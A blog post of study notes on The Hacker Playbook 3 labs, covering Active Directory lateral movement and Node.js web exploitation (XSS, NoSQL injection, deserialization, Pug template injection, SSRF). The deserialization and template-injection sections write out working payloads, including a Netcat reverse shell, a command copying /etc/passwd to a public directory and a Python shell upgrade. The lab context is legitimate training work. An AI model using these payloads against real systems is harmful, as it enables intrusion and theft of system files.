Bloodhound is a cool way of looking at things graphically. I used it for the SANS 2018 Holiday Hack (KringleCon) – one of the exercises involved analyzing a Bloodhound file. It’s definitely handy. From a defense perspective, it would be very helpful for identifying potential exploitation paths. It can be run through Empire, and there’s a faster C# option (Sharphound). The ingestor has to be on the host system, and multiple files are generated that then need to be pulled over for analysis. The wiki is a great resource and is what I used for KringleCon. Kim provided files to work with. Unfortunately they are in CSV format, and Bloodhound 2.0 only takes JSON. I may go back later and convert the CSV to JSON, but for now I’ll move on since I worked with Bloodhound for KringleCon. The built-in queries are useful, so the tool is easy to get functioning once you have the files.

Some additional Bloodhound resources from Kim:

Moving Laterally – Migrating Processes

When you have a box with multiple users, it’s common to make/migrate tokens of different users. Metasploit can do this with the incognito module. Empire uses steal_tokens. According to Kim, this can break shells, so it’s a good idea to inject a new agent into a process owned by a different user. Empire’s PSInject can be used for this.

Moving Laterally Off Your Initial Host

The simplest option to pivot is using the permissions of the current user to get another box. There are options for this in Empire (the find_localadmin_access module) and Metasploit (local_admin_search_enum). Empire also has a lot of other options, so it’s a matter of spending time with it. There is also an option using Windows Management Instrumentation (WMI) in Empire.

Lateral Movement with DCOM

Distributed Component Object Model (DCOM) is another option for moving laterally. DCOM applications can be checked in PowerShell using Get-CimInstance Win32_DCOMApplication.

Some resources for learning more…


Pass-the-Hash

Hashes are fairly easy to get – Mimikatz and Responder have both been used to grab hashes in this chapter. The hashes can be passed using either Empire (powershell/credentials/powerdump) or Metasploit (exploit/windows/smb/psexec). This is an older method, but it may still be encountered.

Gaining Creds from Service Accounts

This section talks about Kerberoasting. PowerShell is used to pull ticket info into memory; PowerSploit could also be used. Mimikatz can then export the tickets, which have to be downloaded for cracking. The hashes can be cracked with tgsrepcrack, John the Ripper, or Hashcat. There is also a module in Empire to do this.

Dumping the Domain Controller Hashes

Multiple options here. You can run commands on the domain controller and use Volume Shadow Copy or raw copy techniques. NinjaCopy and DCSync can also be used.

Lateral Movement via RDP over the VPS

Back to that VPS setup earlier…basically infect host, SSH from attacker to the VPS, set up local port forward, set up port forward in Meterpreter, and open RDP on the attack box. It’s more involved than that, but that’s the basic approach.

Pivoting in Linux

dnscat2 and Meterpreter have their own forwarding. An SSH shell could be obtained via local file inclusion or remote code execution. There’s also mimipenguin, a tool similar to Mimikatz, to pull creds.

Privilege Escalation in Linux

Same basic approach as Windows. LinEnum is a big help for finding possible routes of exploitation. It returns a lot of info in my experience, but I’ve found it helpful in CTFs I’ve done. Kim also mentions Linux Exploit Suggester, which I’ve come across before. Raj Chandel has a great blog post on Linux privilege escalation that provides some additional options. Kim talks about DirtyCow, which exploits a race condition. The only problem is it can cause kernel panics, so you need to match the exploit to the kernel version.

Linux Lateral Movement Lab

I had to switch these VMs over to VirtualBox. That became a bit of an adventure, so it turned into a separate blog post on converting VMs and dealing with IPs in a virtual lab. Just another hurdle to getting through this chapter. Good practice, but not exactly on-task. You do need sudo access to edit the interfaces file, so luckily Kim provided login info. There are likely other ways of doing it, but I didn’t want to spend any more time digging than I already had.

Scan the network, see what’s open. Check out the box that has a webserver set up. Several services are running. Kim says a web fuzzer showed OpenCMS running Struts2, which has been involved in breaches before. Check Metasploit for an associated module and give it a shot (struts2_content_type_ognl). Just running it with the default options, I didn’t get anywhere. When I kept reading and followed Kim’s steps, I still didn’t get anywhere. Or so I thought – this exploit will not show a session in Metasploit. It reports that the exploit completed, but no session was created. Reading on to get the tidbit about going back to dnscat, I got everything working. I should remember to skim over the sections before I start when it’s been awhile since I read them. The dnscat shell is a bit slow, so some patience is required.

Everything worked as it should, so on to DirtyCow. I had to switch over to a NAT network for this so I could fetch DirtyCow. I ran into issues with wget being unable to resolve the host address. It seems that Ubuntu 16.04 and up sometimes has DNS issues in VirtualBox. Rather than track down a fix, I decided to just use my VPS since I can use its IP easily. With that, I was able to get the DirtyCow exploit to work and add Kim’s suggestions to make the exploit more stable.

Following Kim’s direction, I was able to get over to the Jenkins box without issue. Pulling up the Jenkins site using port forwarding was incredibly slow – so painfully slow you think it died. But I was able to see what I was supposed to see and get all the way through Kim’s walkthrough. I followed his instructions exactly the first time to move quickly, since DirtyCow can be unstable. I’ll take more time to look around when I come back to the lab. The ending point from the book’s perspective was getting an .ibd file. I believe the database can be recovered from the .frm and .ibd files available as the db_backup user, but that will require some research.

Wrap Up

Completing this chapter was a marathon effort. I think I’ve been working on it off and on for a month. It was equal parts maddening and rewarding: great because I learned a lot, but frustrating when trying to track down why things weren’t working. Working with Active Directory and setting up a network was good experience. Taking that over to a server where I can build out a more complete network will be great. I had one or two servers plus several workstations going at once, and running all that alongside Kali ate all my RAM and resulted in paused VMs. Not surprising.

Next Steps

  • Dedicate some time to Empire

  • Build network on server

  • Keep working on everything

  • Rejoice that chapters 5 and 6 are relatively low-key

THP3 Ch 3 Review


THP3 03 – The Throw – Web Application Exploitation

I’ve been working on web app exploitation for bug bounty stuff, so I was excited for this chapter. Not much detail getting started – just notes to look elsewhere, specifically the OWASP Testing Guide. The other standard reference is The Web Application Hacker’s Handbook 2nd ed (WAHH). I have both and am using both. If you’re a video person and want an overview of web hacking, the Introduction to Web Hacking 101 video from PAHackers and Brandon Keath is a really nice intro.

Kim notes that many attacks haven’t changed since THP2, so they won’t be repeated. I get it, but I would have rather seen them included. The focus will be on newer critical exploits. If you need background in web app exploitation, I’m enjoying working on stuff from PentesterLab. I think the combination of this book and the other things I’m working on will give me a solid foundation for web app exploitation. Someone also brought up the OWASP Juice Shop at book club – this is another vulnerable app to attack and looks like a pretty good resource. The Natas wargame on OverTheWire is another good place to practice. I’ve done a little of it and plan to go back to it as I work through the various web hacking things I’m doing.

Bug Bounty Programs

This is a specific thing I’m targeting, so this was a nice section to have. Kim notes it takes 3-6 months to consistently find stuff, so that gives me a good time frame to keep in mind.

Common bug bounty programs:

There are more, just do some digging. Kim recommends starting with older or no-reward programs because they are less likely to have pros working on them. Remember to be careful about scope and what can be done.

I recommend starting with the resources already noted, the Cybrary Web Application Penetration Testing course (a bit dated, but good info), and Bugcrowd University. With those done, I felt like I had a good handle on what goes on in this chapter.

Something to note is that everything I’ve looked at stresses the importance of writing up your results well. This includes written documentation, screenshots, videos, and other ways of demonstrating proof of concept. Bugcrowd University has a very good primer on this and recommends using Markdown. I’ll second that recommendation – I’ve switched to using a Markdown editor to write blog posts and several other things, and it works very well. There are lots of Markdown options; Typora works well for me, is free while in beta, and gets solid reviews. Visual Studio will also do Markdown, so it’s really a matter of finding what works for you. If you prefer online, I like StackEdit, and Dillinger gets good reviews.

The frequent mention of writing up your results well is a big part of why I’m sharing my THP3 notes and trying to blog somewhat consistently about info sec stuff. This is less formal than I would make bug reports, but it’s helping me internalize what I learn and given all the academic writing I’ve done, formal writing is less of a concern. Kim provides a link for a report generation form that can also be helpful.

Web Attacks Introduction – Cyber Space Kittens

So at this point, Kim has led us through recon and discovery (or enumeration) of the target website – Cyber Space Kittens (CSK). There is another VM provided for the web app exploitation exercises. That’s 2 so far for this book. If you are doing much with VMs, you may want to consider an external hard drive to store them or they may eat your hard drive.

Kim walks you through adding the VM to your hosts file. This was nice to have included because it’s often a must-do when you are working on a host-only network. And since I’ve previously found some tools play nice with IPs and some play nice with URLs, this is a vital step for practicing. To do this, edit the /etc/hosts file and add a line to identify the host – <IP address> <name>. Remember you may have to edit the IP later if you shut things down and come back. It’s pretty straightforward, but to give you an idea of what it might look like (the IPs here are just examples):

  127.0.0.1       localhost
  192.168.56.101  vulnerablemachine
  192.168.56.102  anothervulnerablemachine

Side note here – if you aren’t familiar with the various text editor options in Linux, you might want to make a note. Kali has Leafpad and Vim is also common. I like this reference by Christopher Kielty as a quick guide. It’s good to be familiar with several since you may get a shell on a machine with an editor other than the one you are most comfortable with.

The Red Team Web Application Attacks

Some rehashing here with a few links. One was to a checklist. Lots of bitly links, which are always an adventure since you really don’t know where they are going. Kim also states the older books were focused on how to test web apps, so this one will skip the basics and move into attacks used in the real world. It’s fine, but it bugs me. I went digging to see what the differences might be and how the books are supposed to be regarded as a group. Based on this reddit, it seems to be a bit of both editions and series. Looking at it a little more, I picked up the Kindle version of THP2 because it looks like a good reference and I like how Kim approaches things. Pardon that squirrel chasing – back to the book at hand.

Setting Up Your Web App Hacking Machine

The vulnerable app is written in Node.js, which is popular for several reasons – fast, cross-platform, etc. Kim does a good job explaining why Node.js was his choice. Basically it’s popular, has a ton of open source libraries, and some of those libraries are vulnerable.

Kim lists some browser extensions – Wappalyzer, BuiltWith, and Retire.js. I’m familiar with the first two. Retire.js is new to me and seems to be available for Chrome and Firefox, but the store extensions don’t appear to come from the original GitHub project. There are also Burp and ZAP plugins, which looks helpful – and since I can trace those back to the GitHub developers, I’m a little more comfortable with them. Note these aren’t on my version of the THP3 Kali build, so you may need to install them. The VM also doesn’t have Chrome, so it’s going to take some time to get set up in the VM for this. I like having both Chrome and Firefox available for testing, and I do switch over to a Windows box at times.

I’m not thrilled with the permissions for the Retire.js add-on in Firefox, so I was going to use the one from the GitHub. That one uses the Add-on SDK for Mozilla, though, which isn’t great for long-term usage. Looking at what it needs, I think going with the BurpSuite and ZAP plugins is the most efficient option for my usage. Unfortunately, the BurpSuite plugin only works with Pro, and that’s not something I’m doing quite yet. I suspect I’ll end up buying it later, but I need to be a little farther along with my bug bounty work to justify the expense. I use the free version of BurpSuite frequently though, and it has a lot of really nice features. Adding the plugin to ZAP was simple – download it, open ZAP, File > Load Add-on File… > choose the file. Then check that it worked by clicking the “Manage Add-ons” icon (3 little squares) to see if it’s listed.

I also recommend using Foxy Proxy – it will make your life much easier as you need to turn proxies on and off. It can be installed from the add-ons store in either Chrome or Firefox. And remember that Burp and ZAP running at the same time will conflict. If your listener isn’t working, make sure you didn’t forget to close the other one.

Web Discovery

Once you have your target, it’s time to start enumerating it. You can spider with BurpSuite, and I’ve found it to work well. It’s also helpful as a proxy, and the Decoder tab comes in handy. But there are a fair number of things only available in the paid version.

I haven’t used OWASP’s ZAP as much, but it’s worked well when I have used it. It’s setup similar enough to Burp that you can adjust between the two fairly quickly. There are also plenty of resources available at the ZAP project page.

DirBuster is inactive, but gets the job done. It is also available as a ZAP add-on, so that is probably the way to go.

GoBuster worked well and quickly. I like being able to designate which status codes are deemed positive, and there is an option to check for extensions. I’ll likely play with this one more.

Running through the tools, you can see multiple vulnerabilities in the chat VM. Kim notes that for an audit or pen test, these vulnerabilities would be reported. However, for red team purposes, they’ll be ignored in favor of things that would get advanced access, shells, or data leaks. As someone still learning the specifics of pen testing vs. red teaming, I found this info helpful. And it makes sense: since red teaming is a longer-term approach, the things that could cause the biggest issues (and fines) are understandably the focus.


Cross-Site Scripting (XSS)

Cross-Site Scripting (XSS) testing takes time and is a popular target for bug bounties. If you aren’t familiar with a lot of the basic exploits, Hacksplaining has nice introductory lessons. Web for Pentester is another good place to work on the basics. I’ll be using that to test out some of these exploits as well, since I’m working on it to improve my web app hacking.

Kim starts off with basic attacks since they aren’t really harmful (that doesn’t mean it’s cool to go out and do these where you aren’t authorized to do so) and provides info for a basic XSS, cookie stealing XSS, forcing a file download, redirecting a user, and another script to enable key loggers and other capture options. This portion has text and then a series of exercises, so I’ll have notes on the text and then the exercises.

Resources for obfuscating payloads for XSS

WAHH goes into more detail about avoiding XSS filters and does a good job explaining what may work and why. Kim notes that not all JavaScript payloads require the <script> tags, so you can avoid filters looking for those tags. Kim provides a reference on HTML Event Attributes for more info and directs you to try them out in the chat VM.

Get things set up, log in, go to the chat… the basic script works as expected (entered in the chat, not in the URL). All of these were straightforward. Note that the onload command waits for everything to be loaded, so there may be a time delay or a refresh needed. Kim includes links to an archived XSS Mind Map by JackMasa and an HTML5 Security Cheatsheet that shows which vulnerabilities various browsers have. The section ends by introducing polyglot payloads that can avoid a lot of input validation checks. The provided reference about polyglot payloads from 0xSobky – Unleashing an Ultimate XSS Polyglot – provides a really nice rundown. Playing around with the polyglot payload in the book, it has 2 alerts. You can number the indicators (like alert(1), alert(2)) to determine which alert made it through input validation, which should let you narrow down what’s being done and refine your exploit. Until you get used to it, you might want to keep a URL-encoding reference handy, like the one from w3schools, to help with avoiding input validation.

BeEF (Browser Exploitation Framework)

BeEF is a fairly popular tool. I tried it on a couple of different examples in Web for Pentester from PentesterLab. It seems pretty straightforward – find a way that XSS can be exploited and pop the BeEF script in there. Same thing for the chat VM. BeEF gives you full control of the target’s browser, so there’s a lot you can do. It’s going to take some time to go through all that BeEF can do, but it’ll be a good tool to get familiar with. BeEF can also be set up to work with Metasploit, which looks like a great additional option.

Blind XSS

Blind XSS is difficult to detect because it’s not visible to the attacker or user – just the admin or a back-end employee. XSSHunter is the recommended tool. It does require an account and creation of a custom subdomain. I believe this means both VMs will need to be connected to the Internet rather than in Host-Only mode. Switch the network adapters over if necessary, go through account creation and…the basic script worked fine. I did have to refresh the page to see the website (under the XSS Fires tab). The site also has multiple other payloads available. This will be fun to use on the Web for Pentester VM to see how some of the other payloads function. Some additional reading on blind XSS basics.


DOM-Based XSS

Kim states DOM-based XSS is a little less straightforward than other types. I agree. DOM (Document Object Model) XSS is based on being able to manipulate client-side scripts. The browser parses HTML into the DOM, and that DOM is what client-side scripts actually work with. Looking at the source code as instructed, you can see a spot where the code says '': '+msg.msgText+' where you would expect to see your username and message in the message window. You don’t see the alert payload directly, which makes it harder to find where you may need to adjust the payload or where it’s executed. Definitely something to go play with some more in my other web app hacking tools.

Advanced XSS in NodeJS

Defending against XSS is difficult. You can’t just filter specific characters or words. As WAHH points out, if the input validation is just looking for <script>, you can change it to <scRipt> (as seen in the polyglot example) to avoid the check. All languages have different things they are susceptible to, including NodeJS. The particular package used to build the chat VM doesn’t have built-in XSS protection unless rendering is done through the template engine. With a template engine, XSS vulnerabilities tend to show up through buffered code and string interpolation.

Template engines basically have spots to use for string variables (string interpolation). Pug can use both unescaped (!{}) and escaped (#{}) string interpolation. When escaped string interpolation is used, characters like < > ' " are HTML-encoded. Unescaped string interpolation typically results in XSS vulnerabilities. Escaped interpolation can also result in XSS vulnerabilities if the value is passed through JavaScript. In Pug, anything following != is buffered unescaped and will be evaluated as JavaScript. And anytime you can insert raw HTML, there may be XSS vulnerabilities.
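To see the difference concretely, here’s a Python approximation of escaped vs. unescaped interpolation using the standard html module (Pug escapes a similar character set; the template strings here are illustrative, not Pug output):

```python
# Approximate Pug's escaped (#{}) vs unescaped (!{}) interpolation.
from html import escape

user_input = '<script>alert(1)</script>'

escaped = "<p>" + escape(user_input, quote=True) + "</p>"   # like #{msg}
unescaped = "<p>" + user_input + "</p>"                     # like !{msg}

# Escaped output neutralizes the tags...
assert escaped == "<p>&lt;script&gt;alert(1)&lt;/script&gt;</p>"
# ...while unescaped output leaves the payload live in the page.
assert "<script>" in unescaped
```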


Exercises

Exercise 1 was an example of good string interpolation with no real options to escape it. To determine this, a basic alert was entered and then the source code was viewed to see how the script was handled.

Exercise 2 showed unescaped string interpolation. Enter the basic alert exploit, submit it, get the alert. Then view the page source code to see how the script was handled.

Exercise 3 shows dynamic inline JavaScript with escaped string interpolation. The input is inside a script tag before the escaped interpolation. This means the JavaScript will automatically execute. Since it’s already in a script tag, you don’t even need to use the script tags. Putting quotes around the interpolation would have protected against this vulnerability.

Exercise 4 is unescaped buffer code. There’s no escaping, so it’s vulnerable by design. The basic alert script will work here.

Exercise 5 is escaped string interpolation inside escaped dynamic inline JavaScript. The app is doing some minimal filtering, but the escaped string interpolation is in a script, so you have to figure out how to escape the filtering. This can be done using “esoteric” JavaScript – basically a bunch of []()!+ craziness. I’ve seen this before, and it’s definitely something to copy/paste. Kim provided a reference to a tool that will create this notation.

Overall, it’s difficult to protect against XSS. Understanding context and if escaping is required is critical to understanding the vulnerabilities. All languages have issues with XSS, so you have to understand the language and framework. This is why running things like Wappalyzer and BuiltWith and viewing source code is important.

XSS to Compromise

Once you’ve got a vulnerability, getting to shell is of course desired. Getting a user-to-admin style XSS in a CMS or similar can lead to complete access. Kim references a walkthrough by Hans-Michael Varbaek that has quite a bit of info. BeEF has exploitation using JavaScript. And a cool thing you could do is put a JS XSS payload on a victim machine, get the internal IP, and scan from there with the payload.

NoSQL Injections

It was nice that this section didn’t focus on SQL injections. Kim covered SQLMap in THP1 and THP2. I’ve used SQLMap and found it works well. THP3 focuses on NoSQL because it’s becoming more prevalent. The typical SQL databases (MySQL, MSSQL, and Oracle) are relational, while NoSQL databases usually aren’t. NoSQL injections may work differently than traditional ones and are often found where strings are parsed into queries. A typical injection is {"$gt":""}, which uses the $gt (greater than) operator to match any value greater than ""(the empty string) – effectively matching everything. It’s equivalent to the standard SQL injection of ' or 1=1--.
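A minimal Python sketch of why that works, using a fake in-memory collection and a hand-rolled query matcher rather than real MongoDB code (all names here are invented):

```python
# Toy MongoDB-style matcher to show why {"$gt": ""} bypasses a login check.
users = [{"user": "admin", "password": "s3cret"}]

def matches(doc_value, condition):
    # A literal condition must match exactly; an operator dict is evaluated.
    if isinstance(condition, dict) and "$gt" in condition:
        return doc_value > condition["$gt"]
    return doc_value == condition

def find_user(user, password):
    return [d for d in users
            if matches(d["user"], user) and matches(d["password"], password)]

# Normal failed login: the wrong password matches nothing.
assert find_user("admin", "wrong") == []
# Injected condition: any non-empty password is > "", so the check passes.
assert find_user("admin", {"$gt": ""}) == [{"user": "admin", "password": "s3cret"}]
```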

A few other NoSQL injection resources…

Attack the Customer Support System NoSQL Application

Use Burp and try logging in with random info to see what you get back. You can see the username and password attempt being passed, so you might be able to put a conditional in there to do the traditional SQL injection attack. You won’t see the server-side source code in a black-box test, but you can expect a query to the backend database, MongoDB in this case. So looking at it, the attack makes sense. All you have to do is edit the request as it proxies through Burp – pretty straightforward. Putting the NoSQL injection of {"$gt":""} in for the admin password, you can see some input checking in Burp. That’s easy enough to edit and get admin access.

Kim goes on to emphasize the discussion of NodeJS is showing the ways new vulnerabilities can be introduced by newer frameworks and languages. One way this occurs for NodeJS is the qs module – it converts HTTP request parameters into JSON objects and is used by default in Express. This is important because on the server side, POST requests will be converted to JSON if bracket notation is used. Good to know. The edit here is a little different – the exploit goes before the =. So you get password[$gt]=. This syntax can also be used to get usernames. Just stick in the same thing, and you should be able to go through each user in alphabetical order. This works and is begging for a script to automate it. You do have to remember to include the previous user in the exploit:
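The qs behavior is easy to mimic. A simplified Python sketch of the bracket-to-object conversion (real qs handles deeper nesting, arrays, and parse limits), including my guess at what the user-enumeration body looks like with the previous user fed back in:

```python
# Simplified mimic of Express/qs bracket-notation parsing.
from urllib.parse import parse_qsl

def qs_parse(query):
    result = {}
    for key, value in parse_qsl(query, keep_blank_values=True):
        if "[" in key and key.endswith("]"):
            outer, inner = key[:-1].split("[", 1)
            result.setdefault(outer, {})[inner] = value
        else:
            result[key] = value
    return result

# password[$gt]= becomes an embedded MongoDB operator instead of a string:
assert qs_parse("username=admin&password[$gt]=") == \
    {"username": "admin", "password": {"$gt": ""}}

# For enumeration, feeding the previously found user back in asks for the
# next username alphabetically (this body shape is my assumption):
assert qs_parse("username[$gt]=admin&password[$gt]=") == \
    {"username": {"$gt": "admin"}, "password": {"$gt": ""}}
```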


I found the same reference Kim provided when looking for more info – Hacking NodeJS and MongoDB. The Websecurify author has a couple of projects for working on NodeJS hacking that should be good references, and they use Docker, so there’s the added bonus of getting more experience with that.

Deserialization Attacks

I haven’t done much with deserialization, so I looked over the OWASP Deserialization Cheat Sheet to get some general info. From that info, serialization is putting an object into a data format that you can restore later (save, send, etc.). Deserialization is the reverse – rebuilding the data into an object. This is most popular with JSON right now; it was XML previously. Coding languages have native ways of serializing objects, which offer their own opportunities for exploitation.

Back to THP3 and dealing with NodeJS… serialize.js is being used, which is upfront about being a potential security issue. You can pass untrusted data to the unserialize() function to get arbitrary code execution. The serialize.js library uses eval(), which will execute raw JavaScript – not a great option for user input. You need to create a serialized payload that will be deserialized and sent through eval() to execute the JavaScript payload. More info and the JavaScript payload can be found on the OpSecX blog.
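To make the danger concrete, here’s a Python sketch that mimics what an eval()-based deserializer does with node-serialize’s function marker (simplified: the payload here just computes a value, where a real exploit would run child_process.exec):

```python
# Sketch of an eval()-style deserializer, mimicking node-serialize's
# handling of its _$$ND_FUNC$$_ function marker. Never do this with
# untrusted input.
import json

MARKER = "_$$ND_FUNC$$_"

def unsafe_deserialize(payload):
    obj = json.loads(payload)
    for key, value in obj.items():
        # Strings carrying the function marker are eval()'d on the spot,
        # which is exactly what makes the attack work.
        if isinstance(value, str) and value.startswith(MARKER):
            obj[key] = eval(value[len(MARKER):])
    return obj

# A "function" smuggled into the data runs the moment it is deserialized.
payload = '{"rce": "_$$ND_FUNC$$_(lambda: 40 + 2)()"}'
assert unsafe_deserialize(payload)["rce"] == 42
```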

The walkthrough starts with a nice feature of Burp – the decoder. I find it pretty handy and easy to use. Drop the cookie into the decoder and Base64-decode it. It shows up as {"module":"node-serialize"}, so you can see the serialize module is being used. Since you can’t write directly to the web directory and have it accessible in NodeJS using Express and Pug like you can in PHP, there must be a specified folder path exposed to the public internet. (Seriously, tips like this alone make the book worth reading. And seeing how Kim approaches things is helping me understand how to do this job.)
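The decoder step is easy to reproduce outside Burp; a quick Python equivalent (the cookie value is constructed here for illustration rather than taken from the lab):

```python
# Base64-decode a session cookie to see which serializer is in play,
# the same step Burp's decoder performs.
import base64

cookie = base64.b64encode(b'{"module":"node-serialize"}').decode()
decoded = base64.b64decode(cookie)

assert decoded == b'{"module":"node-serialize"}'
```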

Side note…as of Firefox 52, there is captive portal detection that can be extremely annoying to click through when using Burp to proxy. You can tell Burp to ignore it or turn it off in Firefox. More info can be found here, but good grief that was annoying.

The walkthrough worked with no problem. Kim recommended doing some post exploitation, including reading the /etc/passwd file. I played around a little and had no issues executing Bash commands this way. I decided to get adventurous and try popping a shell with msfvenom. I found this msfvenom cheat sheet, which is a nice, concise reference – I’ve used it before for PHP payloads, and it works well. This time it gave me an error, so I did some more research. I found a method by Wiremask to get a reverse shell; it’s not quite what I’m working with, but I want to hang on to the link for future reference.

I thought about what I was doing and decided to try getting a shell with Netcat. Using a basic Netcat reverse shell, I was able to get a connection, but not an interactive shell. I remember running into this info before, so I popped up my notes, and found the way I got the shell using Python thanks to pentestmonkey. Once I got the interactive shell, I decided to look around a bit. But not long because I need to continue with the chapter.

So I’ll remember, here are the pertinent parts for getting the /etc/passwd file and getting a shell with Netcat. These just need to be put in the basic exploit and then into whatever way you are using the exploit.

  //Basic exploit portion, may need to be put into other things
  require('child_process').exec('stuff you want done')
  // The exec() portion to get the /etc/passwd file:
  exec('cat /etc/passwd >> /opt/web/chatSupportSystems/public/hackedpass.txt', function(error, stdout, stderr){console.log(stdout)})
  // The exec() portion to get a Netcat reverse shell
  exec('nc <hostIP> <hostPort> -e /bin/bash', function(error, stdout, stderr){console.log(stdout)})

Template Engine Attacks – Template Injections

Template injection is passing user input into render templates, so the underlying template can be modified. This is rarely unintentional and may be misinterpreted as XSS. This can also allow you to access the underlying OS to get remote code execution. You can use newline characters in template literals, which is needed for this exploit to get out of the paragraph tag because, like Python, Pug is space/newline sensitive. Kim points to Server-Side Template Injection by James Kettle as a good reference.

Template Injection Example

The walkthrough was pretty straightforward – you have to figure out if the input supplied can process basic operations. First up was trying a basic XSS script in the user field of DMs in the chat VM. That worked, so there’s an XSS vulnerability. Next question is can you interact with the template?

Checking this involved Burp Repeater and swapping in a couple of things to see if the input would execute basic math. If you haven’t used it, Burp Repeater does what you’d think: pick a request, mess with it, and resubmit it repeatedly without going back to your browser. Big time saver and very useful. Looking at the portion passed to the template (ti), you can see that the input is wrapped in paragraph tags, so if you can escape those, the exploit may work. Since Pug is space/newline sensitive, a newline should do it. Some URL encoding is needed (%0a for newline and %3d for =), and the easiest way to handle it is to put what you need in Burp’s Decoder. The first test will be just a newline, then some basic math.

So in Burp decoder, enter this and choose to encode as URL:


If this works (you get 81 outside of the paragraph tags), you have access to the global object. To get from here to shell execution, you have to find the right function to execute. First up is checking out the self global object root so you can see what you have access to. Eventually, you want to get back to the Require function to import the child_process.exec exploit to run OS commands. So after checking if you can access the global object, you need to parse it.
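If you’d rather build the encoding outside Burp Decoder, Python’s standard library does the same job. This assumes the probe is a newline followed by = 9*9, matching the 81 check above (percent-encoding is case-insensitive, so %0A and %0a are equivalent):

```python
from urllib.parse import quote

# The probe: a newline to escape the <p> tag (Pug is newline sensitive),
# then "= 9*9" so Pug evaluates the math and outputs 81.
payload = "\n= 9*9"
encoded = quote(payload, safe="")
print(encoded)  # %0A%3D%209%2A9
```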

  each val,index in global
    p= index

Kim states that from here on it’s trial and error to see what will work. He says to pick “process” from the methods because it will eventually get us to require. You can check the methods you have access to by adding .&lt;method&gt; after global above, then add another .&lt;method&gt; to explore what’s available under process. Find require under mainModule, and try exploiting it. Remember to URL encode this before putting it back in Burp Repeater.

  - var x = global.process.mainModule.require

Enter whatever commands you would like, similar to those found in the deserialization portion. The - at the beginning of the line marks unbuffered code in Pug, so the line is executed but nothing is rendered to the output.

I used a basic Netcat reverse shell, then the Python trick mentioned above to get an interactive shell. So these were the commands required…

In the system command portion of exec():

  nc <hostip> <hostport> -e /bin/bash

On the host, start the listener; once the shell connects, Netcat prints a line like connect to &lt;hostIP&gt; from &lt;targetip&gt;, and you upgrade the shell by running the Python one-liner inside the connection:

  nc -nlvp <hostport>
  python -c 'import pty; pty.spawn("/bin/sh")'

This section wraps with a mention of Tplmap, which is similar to SQLmap. It ran fine and returned several working injections. It lists the plugins used, which will be helpful for looking at specific exploit options.

  ./ -u '<urltocheck>'

JavaScript and Remote Code Execution

Remote code execution (RCE) is a goal for pen testing and is most commonly found where uploads are allowed. Kim provides a reference on Github for webshells with the caveat that they should be used at your own risk. Second this – validate webshells as best you can by looking at the code, finding multiple references, etc. Digging around in hacking definitely leaves you exposed, so be mindful of that.

Attacking the vulnerable chat application with upload

I’ve done file upload exploitation in PHP before, but how you exploit uploads depends on the platform. In Node, you can’t just request the uploaded file in the browser to execute it the way you can in PHP, so this is a little different. This exploit uses a dynamic routing endpoint, which reads the uploaded file assuming it’s a Pug file. It comes back around to the Netcat shell I’ve been using, except the payload goes into a text file. Upload it to the VM, grab the hash, and navigate to that filehash via drouting to trigger RCE. Pretty straightforward, but following Kim’s commands, Netcat wasn’t in verbose mode, so it was hard to tell when the shell connected. I prefer adding the v option so you can see what’s going on. This didn’t give an interactive shell, so I used the handy Python option to upgrade to a regular shell.

A couple of key points on where to find things: you’ll need the HTTP history tab under Burp’s Proxy tab to retrieve the filehash. It may be buried and easy to miss, so the search feature can help, and depending on how much you’ve forwarded in the Intercept tab, you may need to go back a ways. Look for a URL containing “fileupload” to find the info you need. The drouting module was flagged in the HTML as something to remove in production, which would be a clue to investigate further in an actual pen test or red team situation. Looking at the code Kim provided, I think this was a specific app.get method added to test dynamic routing that is somewhat unique. I haven’t found references to it elsewhere, so it may be an example of why reading the source code and doing some trial and error based on what you know is so important.
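So future me doesn’t have to reconstruct it, here’s a sketch that generates the uploaded file’s contents. The unbuffered-code wrapper mirrors the template injection payload above; whether the app needs exactly this structure is an assumption from my run:

```python
# Generate the Pug payload dropped into the uploaded text file. The '-'
# line is Pug unbuffered code: executed server-side, never rendered.
# host_ip/host_port are placeholders for your Netcat listener.
def pug_shell_file(host_ip, host_port):
    cmd = f"nc {host_ip} {host_port} -e /bin/bash"
    return ("- var x = global.process.mainModule.require('child_process')"
            f".exec('{cmd}')")

payload = pug_shell_file("10.0.0.5", 4444)  # save as e.g. shell.txt, then upload
```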

Server Side Request Forgery (SSRF)

SSRF is used to access the local system or internal network, or for pivoting. I wanted a little more info; OWASP’s SSRF page and a blog from Acunetix gave me enough to move forward. Kim says this type of exploit is often dismissed as not a big deal, but from his explanation it can definitely lead to serious damage because it can give you access to the internal network. Kim provides a presentation from Agarri as a reference. Definitely some good stuff there.


This used the DM option. Put in a link, preview it, see what happens. You can point it at localhost, and once you’re there, you need to see what’s available. This is done with Burp Intruder. Kim narrows down the ports (thank goodness; the free version has Intruder, but it’s throttled, and this is one of those features that will likely get me to invest in the Pro version), and you let it run. I’ve done this before, and one of the things to watch for is a response that looks different from the others. In this case, one port (28017, MongoDB’s old HTTP status interface) sent a much longer response and should be investigated. Plug that port number in where the previous one was, and you’re into the MongoDB instance. Once you’re in, keep using the exploited localhost interface in the link to reach the other pages; just pop the info onto the end of the URL.
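If you ever script this instead of eyeballing Intruder’s results, the “one response looks different” check is easy to automate. A sketch with fabricated response lengths (28017 stands in for the MongoDB hit):

```python
from statistics import median

def flag_anomalies(responses, factor=2.0):
    """Return ports whose response length is far above the median:
    the same 'this one looks different' check done by eye in Intruder."""
    m = median(responses.values())
    return [port for port, length in responses.items() if length > factor * m]

# Fabricated example lengths; the long response is the one worth a look
lengths = {80: 312, 443: 310, 8080: 305, 28017: 9210}
outliers = flag_anomalies(lengths)
```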

Relatively straightforward and good practice with Intruder. I wanted to see if I could do something similar with Zap. Close Burp, fire up Zap. Run through the same thing to get the URL into Zap. Right click on it, then choose Attack > Fuzz. Highlight the portion you want to fuzz, pick your payload, and start the fuzzer. It ran very quickly, and highlighted the abnormal response. You can choose to send that URL directly to Firefox, and there’s the mongo db again. I still think Burp is something worth investing in, but it’s nice to be able to figure out how to do similar things in Zap as well. I’m a believer in having multiple tools at your disposal.

XML eXternal Entities (XXE)

